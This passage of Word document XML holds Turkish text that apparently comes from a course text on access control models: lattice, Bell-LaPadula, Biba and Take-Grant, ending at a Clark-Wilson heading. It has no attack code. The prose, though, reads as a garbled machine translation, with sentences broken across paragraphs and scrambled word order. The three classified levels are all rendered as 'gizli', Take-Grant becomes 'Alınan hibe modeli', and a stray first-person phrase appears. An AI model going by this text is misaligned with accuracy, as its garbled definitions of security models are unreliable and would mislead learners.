    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sahte sayfanın ardından. Başlık ve fragman sayfalarında öngörülemeyen ve işler için kullanılamayan bir rastgele sayı varsa, bu tür</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sahtecilik mümkün değildir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Etiketlerin tartışmaları genellikle duyarlılığı yansıtan etiketlere odaklanır</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yetkisiz kişilerce gözlem, ancak etiketler hassasiyeti yansıtabilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fiziksel kayıplara da. Örneğin, belirli bir dosya veya belgenin her zaman erişilebilir olmasını sağlamak, en azından sağlamak kadar önemli olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yalnızca yetkili kullanıcılar bu dosyaya veya belgeye erişebilir. Bu bölümde gizlilik bağlamında tartışılan tüm hususlar;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kullanılabilirliği iyi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ERİŞİM KONTROL MODELLERİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Erişim kontrol politikalarının sıkı bir şekilde incelenmesine izin vermek, çeşitli modeller</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>politikalar geliştirilmiştir. Erken dönem çalışmaları, ABD hükümetinde yürürlükte olan politikaların ayrıntılı tanımlarına dayanıyordu;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ticari kaygıları ele aldı. Aşağıdaki bölümler birkaç modelin genel görünümünü içermektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kafes Modelleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kafes modelinde, her kaynak ve bir kaynağın her kullanıcısı, sıralanan bir sınıf kümesinden biriyle ilişkilendirilir. Kaynaklanan sınıflar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>askeri isimler gizli, gizli, gizli ve sınıflandırılmamış. Belirli bir sınıfla ilişkili kaynaklar belki sadece</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ilişkili sınıfı, sınıfınınkinden daha yüksek veya daha yüksek olanlar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kaynaklar. Bu planın resmi olarak sınıflandırılmış veriye uygulanabilirliği</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>açıktır; bununla birlikte ticari ortamlarda uygulanması da</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uygun ol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bell-LaPadula Modeli</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kafes modeli, ortaya çıkacak tehdidi dikkate almamıştır</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Belirli bir sınıfla ilişkili kişilerin kendileri için bilinmeyen bilgileri bir kaynağa kopyalayan bir programda gizlenen bir Truva atı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>daha düşük bir erişim seviyesi ile. Hükümet açısından, Truva atı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sınıflandırmanın fiili olarak düşürülmesinin etkili olduğu söylenebilir. Gerçeğe rağmen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hiç kimsenin, şu ana kadar önemli bir kayıp yaşadığına dair hiçbir kanıt olmadığını</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>böyle bir saldırının sonucu, böyle bir saldırı çok çekici olurdu ve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alandaki birkaç kişi bu konuda haklı endişeli. Bell ve LaPadula</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>böyle bir saldırıyı dikkate alan bir model geliştirdi.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bell-LaPadula modeli, kullanıcıların ve işlemlerin okumasını önler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kafes modelinde olduğu gibi güvenlik seviyelerinin üzerinde (yani, belirli bir sınıflandırmaya sahip işlemlerin daha yüksek bir değerle ilişkili ver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ileri okuyamayacağını belirtir </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sınıflama). Buna ek olarak, ancak, herhangi bir verilen süreçleri önler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Daha düşük bir sınıflandırma ile ilişkili verileri yazmadan sınıflandırma.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bazıları, işlemin sınıflandırmasını aşağıda yazabilme yeteneğinin gerekli bir fonksiyon olduğunu düşünse de, hassas </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>olmayan veriler yerleştirerek,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hassas bir belgede olsa da, daha az hassas bir dosyada</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Görmesi gereken insanlar için mevcut olabilir - DoD uzmanları bunu verdi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fiili indirgeme tehdidine fazla ağırlık, model hissettiğini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>engellemek zorunda kaldım. Ulusal Bilgisayar Güvenliği tarafından desteklenen tüm çalışmalar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Merkez (NCSC) bu modeli kullandı.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“Yüksek” terimi, bu bağlamda, daha yüksek bir ifadeden daha fazlasını ifade eder.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sınıflandırma - aynı zamanda tüm kaynak kategorilerinin bir üst grubunu da ifade eder. İçinde</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bell-LaPadula modelinin ticari veri işlemeye uygulanabilirliğini öne süren Lipner, kategorilerin bir üst kümesi için olan gereksinimin hükümet çevreleri dışında uygun olamayacağından bahseder.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bell-LaPadula modeli bağlamında dikkate değer bir isimlendirme ortaya çıkmıştır. Okuma kısıtlamasına basit güvenlik özelliği denir. Yazma kısıtlaması, yıldız özelliği olarak adlandırılır, çünkü</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mülkiyet daha resmi bir şekilde verilene kadar bir yer tutucu olarak kullanılan yıldız</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>isim asla değiştirilmedi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Biba Modeli</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bell-LaPadula modelinin iki özelliğini inceleyen Biba, yetkisiz değişikliklerin önlenmesi olarak tanımladığı makul bir bütünlük kavramı keşfetti. Elde edilen Biba bütünlük modeli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bütünlüğün korunması, verilerin bir hazneden akmamasını gerektirir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>daha yüksek bütünlükteki bir hazneye bütünlük verildi. Örneğin, eğer bir işlem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik seviyesinin üzerine yazabilir, güvenilir veriler kirlenebilir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>daha az güvenilir veri ekleyerek.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Take-Grant Modeli</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Denetçiler, kimin yapmaya yetkili olduğu ile ilgilenmeli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hangi verilere ne tür bir erişim sağlanabileceği, ayrıca</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hangi verilere izinsiz erişim sağlanamayabilir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>idari müdahale. Bu olmayan bazı insanlar olduğunu varsayar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yöneticiler, diğerlerine de yetki vermeye yetkilidir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>isteğe bağlı erişim kontrolleri olduğunda durum. Alınan hibe modeli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iptal etme sonuçlarını incelemek için matematiksel bir çerçeve sağlar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ve yetkilendirme. Bu nedenle, denetçiler için kullanışlı bir analitik araçtır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Clark-Wilson Modeli</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
